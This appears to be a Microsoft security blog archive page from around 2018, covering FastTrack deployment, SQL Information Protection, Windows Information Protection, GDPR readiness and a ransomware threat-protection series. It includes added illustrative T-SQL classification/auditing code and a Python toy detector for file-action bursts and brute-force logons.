  • As you implement the adoption plan, FastTrack will monitor and assist you at designated points along the way. Together, you'll work with your internal business stakeholders to drive adoption of new technology and work out any productivity issues. Leveraging the Service Management Toolkit and the Admin Learning Center helps you stay informed and effectively manage the new environment.

Keep everyone informed: provide an FAQ and supporting materials

  • Microsoft FastTrack has templates you can send to your users to educate them about specific features, explain deployment within the organization, how they can register and enroll, and more. These tools and guides are specifically geared toward different departments within your organization, including individuals in HR, R&D, finance, legal, IT, and sales. You can also work with your internal communications teams to develop appropriate supporting collateral.

Ready to take the next step? Start your success plan

Our FastTrack Success Plan is an online tool that walks you through each step of the Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack at:

FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.


Data classification and protection now available for structured data in SQL

This post is authored by Gilad Mittelman, Senior Program Manager, SQL Data Security.

Data privacy and data security have become one of the most prominent topics in organizations in almost every industry across the globe. New regulations that formalize requirements are emerging around these topics and compel organizations to comply.

The upcoming EU Global Data Protection Regulation (GDPR), which takes effect on May 25, 2018, is one of the most noteworthy of these new regulations. It sets a new global bar for privacy rights, security, and compliance, mandating many requirements and obligations on organizations across the globe. Complying with this regulation will necessitate significant investments in data handling and data protection for a very large number of organizations.

GDPR and Microsoft SQL

SQL Information Protection (SQL IP), now in public preview, complements the existing Microsoft Information Protection (MIP) unstructured data classification framework (Azure Information Protection, Microsoft 365) and extends it with new structured data classification capabilities.

Microsoft SQL customers who are subject to the GDPR, whether managing cloud-based or on-premises databases or both, will need to ensure that qualifying data in their database systems is aptly handled, protected and monitored according to GDPR principles. This means that many customers will need to review or modify their database management and data handling procedures, especially focusing on the security of data processing as stipulated in the GDPR. The first step in this journey to compliance is discovering and tagging where such sensitive data resides within the database environment.

SQL IP introduces advanced capabilities built into Azure SQL Database and SQL Server for discovering, classifying, labeling and protecting the sensitive data in your SQL databases.

Discovering and classifying your most sensitive data (business, financial, healthcare, PII, etc.) can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

  • Helping meet data privacy standards and regulatory compliance requirements, such as GDPR.
  • Data-centric security scenarios, such as monitoring (auditing) and alerting on anomalous access to sensitive data.
  • Controlling access to and hardening the security of databases containing highly-sensitive data.

What is SQL Information Protection?

SQL IP introduces a set of advanced services and new SQL capabilities, forming a new information protection paradigm in SQL aimed at monitoring and protecting the data, not just the database:

  • Discovery and recommendations – A built-in classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you an effortless way to review and apply the appropriate classification recommendations via the Azure portal or via SQL Server Management Studio.
  • Labeling – Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
  • Monitoring/Auditing – Sensitivity of the query result set is calculated in real time and used for auditing access to sensitive data. Additional logic can then be applied on top of the audit logs, for identifying and alerting on anomalous access to sensitive data, data extraction of large volumes of PII, etc.
  • Visibility – The database classification state can be viewed in a detailed dashboard in the portal as seen in Figure 1 below. Additionally, you can download a report (in Excel format) to be used for compliance & auditing purposes, as well as other needs.

Figure 1: Data discovery and classification dashboard
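As an added example that is not from the post, here is the T-SQL form these capabilities take in SQL Server 2019 and Azure SQL Database: labels persisted as column metadata, the catalog view that exposes them, and the audit record field that carries the sensitivity of a query's result set. The database, table, label names and audit file path are constructed placeholders; on Azure SQL Database the audit itself is configured through the portal rather than with CREATE SERVER AUDIT.

```sql
USE SalesDb;   -- placeholder database name
GO

-- Constructed sample schema: two PII columns and one non-sensitive column.
CREATE TABLE dbo.Customers (
    CustomerId  INT IDENTITY PRIMARY KEY,
    FullName    NVARCHAR(200) NOT NULL,
    Email       NVARCHAR(320) NOT NULL,
    LoyaltyTier TINYINT       NOT NULL
);
GO

-- Labeling: persist the sensitivity label and information type as column metadata.
-- Label and information-type names are placeholders; use your organization's taxonomy.
ADD SENSITIVITY CLASSIFICATION TO
    dbo.Customers.FullName,
    dbo.Customers.Email
WITH (LABEL = 'Confidential - GDPR', INFORMATION_TYPE = 'Contact Info', RANK = HIGH);
GO

-- Visibility: review what is classified. Unlabeled columns such as LoyaltyTier
-- do not appear here, which is the gap a discovery scan is meant to surface.
SELECT
    SCHEMA_NAME(o.schema_id) AS schema_name,
    o.name                   AS table_name,
    c.name                   AS column_name,
    sc.label,
    sc.information_type,
    sc.rank_desc
FROM sys.sensitivity_classifications AS sc
JOIN sys.objects AS o
    ON o.object_id = sc.major_id
JOIN sys.columns AS c
    ON c.object_id = sc.major_id AND c.column_id = sc.minor_id
ORDER BY schema_name, table_name, column_name;
GO

-- Monitoring/Auditing (SQL Server): capture SELECTs against the table.
-- The server audit lives in master; the file path is a placeholder.
USE master;
GO
CREATE SERVER AUDIT SensitiveDataAudit
    TO FILE (FILEPATH = 'C:\AuditLogs\')          -- placeholder path
    WITH (ON_FAILURE = CONTINUE);
ALTER SERVER AUDIT SensitiveDataAudit WITH (STATE = ON);
GO
USE SalesDb;
GO
CREATE DATABASE AUDIT SPECIFICATION SensitiveSelectAudit
    FOR SERVER AUDIT SensitiveDataAudit
    ADD (SELECT ON OBJECT::dbo.Customers BY public)
    WITH (STATE = ON);
GO

-- Two reads: the first touches labeled columns, the second does not. The audit
-- engine derives the sensitivity of each result set from the column metadata.
SELECT FullName, Email FROM dbo.Customers WHERE CustomerId = 1;
SELECT LoyaltyTier FROM dbo.Customers WHERE CustomerId = 1;
GO

-- Read back the audit log. Only the first SELECT above carries sensitivity
-- information (the label and information type it touched); that field is the
-- input for anomalous-access or bulk-PII-extraction alerting built on the logs.
SELECT event_time,
       server_principal_name,
       statement,
       data_sensitivity_information
FROM sys.fn_get_audit_file('C:\AuditLogs\*.sqlaudit', DEFAULT, DEFAULT)
WHERE NULLIF(data_sensitivity_information, '') IS NOT NULL
ORDER BY event_time DESC;
```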

SQL Information Protection in action demo video

The following video demonstrates the main SQL Information Protection public preview capabilities for Azure SQL DB and SQL Server:

What’s next?

Additional SQL IP capabilities will continue rolling out throughout the upcoming year, with a focus on scale and automation.

We'll be introducing centralized management via Azure Security Center, enabling organizations to customize the organizational information protection policy with proprietary labels and discovery (recommendations) logic enrichment. We'll also be introducing centralized dashboards for visibility into the sensitivity state of all resources across the entire database estate.

In addition, various automation capabilities will be exposed, for supporting fully automated classification and labeling of large numbers of databases at scale.

We encourage customers to contact us with any questions or feedback at

Additional resources on SQL Information Protection

More details on using SQL Information Protection can be found in:


Partnerships power the future of better security

This post is authored by Jeremy Dallman, Principal Program Manager.


Our goal in building the Microsoft Graph Security API is to enable customers to share insights and take action across security solutions to improve protection and speed response. By creating a connected security ecosystem, Microsoft and partners can enable developers to simplify integration and alert correlation, unlock valuable context to aid investigation, and streamline security operations.

Palo Alto Networks shares the vision of enabling better integration to benefit our joint customers. They are a member of Microsoft Intelligent Security Association and as part of the Graph Security API launch at RSA, we showcased an application that demonstrated the power of integration between multiple Microsoft and Palo Alto Networks security offerings. We demonstrated how a Palo Alto Networks provider for the Security Graph can prevent successful cyberattacks by correlating alerts from Microsoft with its threat intelligence, firewall logs, and automated firewall policy changes.

Microsoft Graph Security API proof of concept integration using PowerBI

Our close collaboration continues and this week at the Palo Alto Networks user conference, Ignite 2018, we will unveil the latest joint innovation. Microsoft and Palo Alto Networks have worked to connect the Microsoft Graph Security API and the Palo Alto Networks Application Framework with a provider that brokers interactions between the two platforms. We will also demo a Microsoft PowerBI solution that accesses information from both the Palo Alto Networks Application Framework and the Microsoft Graph Security API giving our customers the ability to query and access all of their security data through a common interface.

For those attending Ignite this week, be sure to join the Wednesday (5/23) 4:00 PM session where Jason Wescott and Francesco Vigo will discuss the collaboration between Microsoft Graph Security API and the Palo Alto Networks Application Framework. If you aren't at Ignite, visit the Graph Security API documentation or sign up to request access to the Palo Alto Networks Application Framework API to start exploring how you can take advantage of this powerful collaboration!


Now that you have a plan, it’s time to start deploying

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, First Things First: Envisioning Your Security Deployment.

In our previous blog post, we covered how FastTrack for Microsoft 365 can help you envision a successful Microsoft 365 security deployment. Now, we'll cover the next phase of our three-phase planning approach: Onboard. This is where you move from strategy and objectives to the practical details of your deployment planning.

The Onboard phase is a critical time to remove any blockers you have, clean up any issues that might prevent your preferred deployment approach, and then start setting up services and users that integrate with your environment. The FastTrack team can help coordinate the setup, configuration, and provisioning of many of your Microsoft 365 services.

We will cover how to Drive Value with FastTrack for Microsoft 365 in our next blog. But first

Your onboard checklist

The following checklist provides some of the items and actions that our FastTrack team can help you work through during the Onboard phase:

Network and Client

  • Identify and prepare DNS, network, and infrastructure needs
  • Configure DNS for eligible services
  • Configure TCP/IP protocols and firewall ports
  • Identify and prepare client needs (Internet browser, client operating system, and services’ needs)
  • Enable eligible services that have been purchased and defined as part of onboarding
  • Establish the timeline for remediation activities
  • Activate your Microsoft online service tenant or subscription
  • Validate connectivity to Microsoft online services


  • Provision user identity including licensing
  • Configure Azure AD Identity Protection
  • Configure Self Service Password Reset (SSPR)
  • Configure Azure Multi-Factor Authentication
  • Configure Privileged Identity Management
  • Set up Azure AD Conditional Access policies
  • Synchronize Azure AD Connect directory (with password writeback and password hash sync)

Access Management

  • Configure identities to be used by Intune, by either leveraging your on-premises Active Directory or cloud identities (Azure AD)
  • Add users to your Intune subscription, define IT admin roles (Helpdesk operator, admins, etc.), and create user and device groups
  • Configure and deploy Intune app protection policies for each supported platform and prepare line-of-business apps for app protection policies

Mobile Device Management (MDM)

  • Configure your MDM authority and policies and test to validate MDM management policies
  • Configure profiles on devices for supported platforms
  • Enroll devices of each supported platform to Intune or Configuration Manager with Microsoft Intune service

Ready for action? Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of the Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value and adoption with users.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.


Securing the modern workplace with Microsoft 365 threat protection – part 4

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Responding to ransomware in the Modern Workplace

Over the last few weeks, we have shared the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect against and detect a modern ransomware attack. Today, we conclude our blog series by discussing how Microsoft 365 threat protection can help respond to attacks and also helps educate and raise awareness of threats to end users. In our ransomware scenario, once the threat has been detected, Microsoft 365 also helps respond and remediate with automation playing a key role in making the response more manageable, accurate, and less time consuming for administration. Microsoft 365 threat protection response and remediation services are shown in figure 1 below.

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace (services shown: Windows Defender Advanced Threat Protection, Azure Advanced Threat Protection, Microsoft Cloud App Security, Azure Security Center, Office 365 Advanced Threat Protection, Office 365 Threat Intelligence)

In our ransomware scenario, Windows Defender Advanced Threat Protection (WDATP) alerts security operations teams about suspicious activities such as programs launching self-replicating copies. If the ransomware does manage to infect multiple devices, WDATP automatically investigates alerts, applies artificial intelligence to determine whether a threat is real and then decides what action to take. It then automatically remediates the threat from affected endpoints to stop further damage as shown in figure 2.

Figure 2. WDATP automation mapping the propagation of a threat

WDATP provides manual machine level responses, such as isolating a machine to contain the threat. Further, forensic data is collected to better understand the attack and the attacker. WDATP also includes file level response by quarantining or blocking malicious files. Azure Security Center also leverages automation by helping orchestrate these common security workflows:

  • Routing alerts to a ticketing system
  • Applying additional security controls
  • Gathering additional information
  • Asking a user to validate an action
  • Blocking a suspicious user account
  • Restricting traffic from an IP address

Azure Security Center employs behavioral analytics to uncover patterns and malicious activity, enabling proactive policies to be put in place to help prevent impact from future attacks. Response times are also improved with expanded signal from Azure Security Center's third-party integrations with firewalls and anti-malware engines. While Azure Security Center enables security operations personnel to respond to threats to the enterprise infrastructure, admins can quickly respond to threats to user identities by creating activity policies with Microsoft Cloud App Security (shown in figure 3), which can take the action of suspending a user account when the predefined conditions are met. In our example, the ransomware propagates using the brute force password technique, which requires multiple logins; login failures from a single account are therefore likely, and this can be a trigger for Microsoft Cloud App Security to suspend an account. One of the powerful benefits of Microsoft Cloud App Security is that it extends protection beyond the Microsoft ecosystem. Even if login attempts are made from popular enterprise applications that are not Microsoft client apps, Microsoft Cloud App Security enables admins to respond to the anomalous activity.


Figure 3. Microsoft Cloud App Security General Dashboard

In Microsoft 365, threat response and remediation is offered with Office 365 Threat Intelligence. Using the Threat Explorer feature, security analysts and administrators can search for all instances of potentially malicious emails that may contain ransomware. The back-end is designed for efficient threat investigation and remediation. Emails that are part of a ransomware campaign can easily be discovered using a variety of search filters with the Threat Explorer shown in figure 4. The admin can select all the emails that need to be investigated from a specific sender and choose to take immediate action on potentially malicious emails including: move to junk, move to deleted items, soft delete, hard delete, and move to inbox. Choosing the delete action purges the malicious emails from all tenant mailboxes. There is also the option of creating an incident so that a manager must approve the action.

Figure 4. Office 365 Threat Explorer email remediation actions

Educating end users about ransomware in the modern workplace

We discussed cyber education as an important element for protecting organizations. Having end users who are prepared and informed on spotting potential cyberattacks is a powerful way to prevent attacks from harming an organization. Attack Simulator, shown in figure 5, is a new feature of Office 365 Threat Intelligence currently in public preview. Among several simulations is the Display Name Spear Phishing Attack. Spear phishing is a subset of phishing, aimed at a specific group, individual, or organization and, as we discussed before, a method of spreading ransomware. Attack Simulator harnesses signal from Office 365 Threat Intelligence, which provides visibility into an organization's most targeted and potentially most vulnerable users and enables admins to launch simulated threats targeting those very same users. This provides the most targeted users with training on recognizing phish emails, which include ransomware, and provides admins visibility on how those users behave during an attack, enabling optimal policy updates and security protocols.

Figure 5. Attack Simulator UI

Since the attack surface of the modern workplace is complex and broad, Attack Simulator will begin to offer simulated attacks made through other attack vectors as it moves from preview to GA. Attack Simulator will help raise user awareness and effectiveness at spotting attacks from all the common attack vectors.

Microsoft 365 threat protection

Microsoft has heavily invested in helping secure our customers for many years by building security in our products from the ground up. In the last few years, as the level of cybercrime has increased, we have also increased our efforts and focus on developing and continuously updating advanced security solutions to protect customers from a wide variety of threats and types of attack. This ransomware scenario is one example of our continued focus on security, which provides end users ultimate protection from modern threats, while giving administrators a powerful set of tools to help protect, detect, respond and even educate against these threats. Threat protection is only one key aspect of Microsoft 365. Learn more about Microsoft 365 and understand how it can help your organization through its digital transformation journey. Additionally, follow the links below to learn more about the Microsoft 365 threat protection services and experience them by starting a trial.


Use Windows Information Protection (WIP) to help make accidental data leakage a thing of the past

Have you always wished you could have mobile application management (MAM) on Windows?

Now you can!

Windows Information Protection (WIP) is an out-of-the box data leakage prevention feature for Windows 10 that can automatically apply protection for work files and data to prevent accidental data leakage. With 600 million active Windows 10 devices, corporate customers continuing to deploy in earnest throughout 2018, and support for WIP built right into Office 365 ProPlus, its benefits are within easy reach.

Sixty to eighty percent of data leakage is accidental (see ICO data for 2016 and 2017). WIP is a key feature that offers much needed data protection for files at rest on the Windows platform, for any organization with sensitive data, big or small. In today's security ecosystem, companies are spending $93B on security features (enough to host seven Olympic Games!). Yet companies still saw a 29 percent increase in data leakage worldwide between 2016 and 2017. WIP comes as a timely solution.

With Windows 10, Microsoft is providing a fundamental solution to this growing problem. Recognizing that the risk of leak comes from both fully managed devices and personal devices accessing work resources, we designed WIP to be deployed on PC and mobile devices running Windows 10. WIP is designed for organizations of all shapes and sizes, as a scalable solution that works to prevent accidental data leakage for end users.

WIP protects users and organizations from accidental leaks via copy-and-paste, drag-and-drop, removable storage (e.g., USB thumb drives), and unauthorized applications (e.g., non-work cloud storage providers). Windows shell integration appears in clear but unobtrusive ways. Elements like File Ownership are displayed and selectable in Explorer and the File Save As dialog. Helpful briefcase icons mark resources when you are in a work context in places like window title bars and Microsoft Edge's navigation bar. Unauthorized applications are blocked from single sign-in with work credentials. WIP also includes the ability to perform selective wipe of business information, while leaving personal data behind.

WIP has three simple policy enforcement modes. It lets you choose how and whether the user experience in the clipboard, save dialog, and similar data-sharing cases have options (overrides) to move work content to non-work context. You can decide to Hide Overrides, Allow Overrides for your users, or even deploy in Silent mode just for auditing. Silent mode does not restrict unmanaged apps from opening work data the way Hide Overrides and Allow Overrides do, so you can get away with configuring less, yet still benefiting from the BYOD selective wipe capability for your work data, such as data downloaded from OneDrive for Business and Outlook email. This means when you or your user decides to unenroll their work account from their personal device, that work data stops being accessible.

WIP policy can be deployed in a few clicks in Microsoft Intune for MAM-only (without enrollment) targeting, MDM (with enrollment), or both. Being able to apply MAM-only policy will help you finally enable BYOD in regions and situations where fully managing the personal device is unacceptable. For companies that are not yet fully in the cloud, WIP policy can also be set on domain-joined computers using System Center Configuration Manager. Then, when you're ready for co-management, you can move the WIP policy management authority to Microsoft Intune.

Your corporate files can also be automatically encrypted with a local key when downloaded to WIP-managed devices. You can do this by configuring your corporate network boundary. Using network isolation policies, you can identify your LAN and corporate cloud resources, which Edge and other applications will use to recognize work sites and encrypt the data that comes from there. This works even better when combined with Conditional Access controls on Exchange Online and SharePoint Online to ensure that only managed devices can reach that data.

Additionally, WIP Learning lets you see the applications you didn't know are used with work data. It reports any app not in your policy that tries to access a work resource. You can see this data in Microsoft Intune or your Windows Analytics portal, if you have Azure Log Analytics (formerly Microsoft Operations Management Suite or OMS). WIP Learning allows you to tune your app policy to add legitimate work apps and even detect apps that should not be trying to access work data. Combined with Silent mode, you can deploy and see the immediate benefit of selective wipe control and auditing, while tuning your app list for different deployment groups in preparation for enabling boundary enforcement.

WIP provides a robust and automatic solution for protecting work data coming to the Windows device, but it also pairs well with Azure Information Protection (AIP). AIP adds the ability to control and help secure email, documents, and sensitive data that are shared, even outside your company and in the Azure cloud. WIP, combined with AIP, provides application-level access control capabilities while preventing unauthorized applications from accessing business information at rest and in flight. At the same time, WIP's simple business vs personal information classification system ensures simplicity and ease of use.

USB flash drives aren't the only way data can leave a device. With the app restrictions on accessing work data, you can use WIP to guide users to use Outlook with their corporate email account to send work attachments, and SharePoint or OneDrive for Business to collaborate on work documents. This lets you enhance your overall data protection with Office DLP outbound rules, send email notifications, policy tips, and Office 365 Information Protection for GDPR.

WIP originally shipped in the Windows 10 Anniversary Update (version 1607) and since then, working across Microsoft and with industry, we have made a number of improvements, including:

  1. Support for Office 365 ProPlus, Microsoft Teams, and numerous inbox apps
  2. Simplified management: Intune quick setup, WIP Learning for Apps and Network Boundary policy
  3. Manageable as MAM-only (i.e. without full device enrollment)
  4. Improved Recovery (e.g. data access resumes via re-enrollment or re-adding your work account)
  5. AIP integration to enable roaming data on removable storage (e.g. USB thumb drives)
  6. Support from 3rd party apps such as from Citrix (ShareFile), DropBox (desktop sync client), Foxit (Reader, PhantomPDF), and WinZip (WinZip 21, WinZip 22)

With all these features available, WIP is easier than ever to deploy and maintain. Enable this fast, robust, user-friendly security solution to help ensure a more effortlessly secure user experience for your organization.

More information on Windows Information Protection (WIP) can be found in the following resources:

The final compliance countdown: Are you ready for GDPR?

On May 25, the General Data Protection Regulation (GDPR) will replace the Data Protection Directive as the new standard on data privacy for all organizations that do business with European Union (EU) citizens.[1] When GDPR goes into effect, government agencies and organizations that control, maintain, or process information involving EU citizens will be required to comply with strict new rules regarding the protection of personal customer data.

GDPR's broad scope and holistic interpretation of personal information leaves these agencies and organizations responsible for protecting a wide range of data types, including genetic and biometric data.[2] Leading up to the GDPR rollout, many companies will be reevaluating their current data storage and sharing methods, and determining whether they need to implement new strategies. More than ever, this regulatory transition highlights the importance of prioritizing a strong and comprehensive security stance within your organization.

According to a recent GDPR benchmarking survey, although 89 percent of organizations have (or plan to have) a formal GDPR-readiness program, only 45 percent have completed a readiness assessment.[3] Regardless of where your organization and its security protocols are in terms of GDPR-readiness, Microsoft can help. Microsoft has been working on GDPR-compliant business and engineering solutions for the better part of a year. Because of our extensive experience developing products with security built in, we've been a leading voice on privacy and GDPR-related issues with EU regulators.

We've turned these conversations and insights into a free, four-part video series. Watch the Countdown: Preparing for GDPR series today to hear from industry experts and learn more about Microsoft's commitment to helping your organization achieve GDPR compliance.

You can also read more about our point of view on this transition as the first hyper-scale cloud vendor to offer GDPR terms and conditions in the enterprise space.

Finally, you are invited to a free May 25th GDPR live webcast, Safeguarding individual privacy rights with the Microsoft Cloud. You'll learn how you can:

  • Use GDPR fundamentals to assess and manage your compliance risk.
  • Help protect your customers’ data with our built-in, intelligent security capabilities.
  • Meet your own compliance obligations by streamlining your processes.


Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best-in-class security solution, especially when a user does not use Microsoft Edge and therefore lacks the benefits of its web protection. In our web-based scenario, the user can access the website through another browser, download the "software update," and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors, and figure 1 summarizes the services which help to detect threats.

[Figure 1: Ransomware Detection with Microsoft 365. Services shown: Windows Defender Advanced Threat Protection, Azure Advanced Threat Protection, Microsoft Cloud App Security, Azure Security Center, Office 365 Advanced Threat Protection, Office 365 Threat Intelligence]

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATP's (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Today's most sophisticated ransomware is designed to spread laterally across networks, increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the Intelligent Security Graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph, enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute-force password method to move laterally through a network, which our Azure ATP service is specifically designed to detect. A brute-force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP, and with signals shared from WDATP, the anomaly would be quickly attributed to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc.). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity; for example, a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities, such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.
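The two behavioral patterns described in the paragraph above, a burst of file deletes/uploads/renames carrying known ransomware extensions and a run of failed logons followed by a success, can be expressed as simple sliding-window detectors. The following is an added example of that detection logic written for this page; it is not Microsoft code and does not reproduce how Cloud App Security or Azure ATP actually implement their policies. The audit events, the field layout (timestamp, user, action, object), the thresholds, and the extension list are all constructed assumptions for the example.

```python
"""Toy UEBA-style detectors over constructed audit events (added example).

Two rules are implemented:
  * detect_file_bursts: a user performs many file delete/upload/rename/modify
    actions inside a short window; the alert also counts how many of those
    objects carry an extension associated with encrypted-file artifacts.
  * detect_brute_force: an account accumulates many LogonFailed events inside
    a window and then produces a LogonSuccess (the brute-force pattern).
"""
from collections import defaultdict, deque

# Assumed list for the example; a real deployment would source this from
# threat intelligence rather than hard-coding it.
SUSPICIOUS_EXTENSIONS = (".locked", ".encrypted", ".crypt")
FILE_ACTIONS = {"FileDeleted", "FileUploaded", "FileRenamed", "FileModified"}

# Constructed sample events: (timestamp_seconds, user, action, object).
# For logon events the object is the (constructed) source address.
SAMPLE_EVENTS = [
    (0, "alice", "FileModified", "budget.xlsx"),
    (30, "alice", "FileDeleted", "old-draft.docx"),
    (45, "alice", "FileUploaded", "report.pdf"),
    (100, "dave", "LogonFailed", "10.0.0.9"),     # two typos, then success: benign
    (104, "dave", "LogonFailed", "10.0.0.9"),
    (110, "dave", "LogonSuccess", "10.0.0.9"),
    (230, "carol", "LogonSuccess", "10.0.0.5"),   # success after a run of failures
]
SAMPLE_EVENTS += [(200 + i, "carol", "LogonFailed", "10.0.0.5") for i in range(6)]
# bob: twelve documents renamed to a suspicious extension within 24 seconds
SAMPLE_EVENTS += [(300 + 2 * i, "bob", "FileRenamed", f"doc{i}.docx.locked")
                  for i in range(12)]


def detect_file_bursts(events, window=60, threshold=10):
    """Return one alert per user whose file-action count inside `window`
    seconds reaches `threshold`. ext_hits counts objects in the burst whose
    name ends with a suspicious extension."""
    recent = defaultdict(deque)   # user -> deque of (ts, object) in the window
    alerted = set()               # one alert per user keeps the example readable
    alerts = []
    for ts, user, action, obj in sorted(events):
        if action not in FILE_ACTIONS:
            continue
        q = recent[user]
        q.append((ts, obj))
        while q and ts - q[0][0] > window:   # drop events that left the window
            q.popleft()
        if len(q) >= threshold and user not in alerted:
            alerted.add(user)
            ext_hits = sum(1 for _, o in q if o.lower().endswith(SUSPICIOUS_EXTENSIONS))
            alerts.append({"user": user, "start": q[0][0], "end": ts,
                           "count": len(q), "ext_hits": ext_hits})
    return alerts


def detect_brute_force(events, window=300, fail_threshold=5):
    """Return an alert for each LogonSuccess preceded by at least
    `fail_threshold` LogonFailed events for the same account within `window`."""
    failures = defaultdict(deque)  # user -> deque of failure timestamps
    alerts = []
    for ts, user, action, obj in sorted(events):
        if action not in ("LogonFailed", "LogonSuccess"):
            continue
        q = failures[user]
        while q and ts - q[0] > window:
            q.popleft()
        if action == "LogonFailed":
            q.append(ts)
        else:
            if len(q) >= fail_threshold:
                alerts.append({"user": user, "failures": len(q),
                               "success_at": ts, "source": obj})
            q.clear()   # a success ends the current attempt sequence
    return alerts


if __name__ == "__main__":
    for a in detect_file_bursts(SAMPLE_EVENTS) + detect_brute_force(SAMPLE_EVENTS):
        print(a)
```

On the constructed input the file detector fires only for bob (alice's three routine actions stay under the threshold) and the logon detector fires only for carol; dave's two failures followed by a success are below the threshold and produce nothing. Tune `window` and `threshold` against your own baseline before treating either rule as more than a starting point.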

Azure Security Center is also connected with WDATP and provides infrastructure-level alerts, and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial, as WDATP also shares the signal with Office 365, and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATP's real-time reporting and Office 365 threat intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office ATP and Office threat intelligence services also track threats found in SharePoint Online, OneDrive for Business, and Teams, so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center, which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.

More blog posts from this series:


Securing the modern workplace with Microsoft 365 threat protection – part 2

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Protecting the modern workplace against Ransomware

Last week, we shared the roots of Microsoft 365 threat protection. This week, we want to share how Microsoft 365 threat protection services work together to help organizations protect themselves. Figure 1 is a graphical representation of the Microsoft advanced threat protection services which secure the attack surface.

Figure 1. Microsoft 365 advanced threat protection services work together to protect the modern workplace from attacks.

We continue with our ransomware scenario. Ransomware restricts data access by encrypting the user's files or locking computers. Victims are required to pay a ransom to regain access to their machine and/or files. Microsoft closely monitors the threat landscape, and our security intelligence provided in figure 2 shows ransomware remains a prevalent and lethal threat type. All forms of ransomware can be launched at an organization through email, the device ecosystem, or through the enterprise infrastructure.

Figure 2. Monthly ransomware and ransomware downloader encounters, July 2016 to June 2017.

With so many different attack vectors, a point service will be unable to mitigate the variety of potential ransomware attacks. Having services that protect specific parts of the attack surface and can also share signals to alert services protecting other surfaces of the enterprise is the only way to help ensure full and near real-time security. In many ransomware scenarios, users receive an email suggesting a necessary software update which can be done by downloading an attachment. The attachment will contain a trojan downloader which can run a ransomware payload once opened. Figure 3 shows the Microsoft 365 threat protection services which can help protect the modern workplace from ransomware attacks.

[Figure 3: Ransomware Protection with Microsoft 365. Services shown: Windows Defender Advanced Threat Protection, Office 365 Advanced Threat Protection, Azure Security Center]

Figure 3. Ransomware protection services for M365 threat protection.

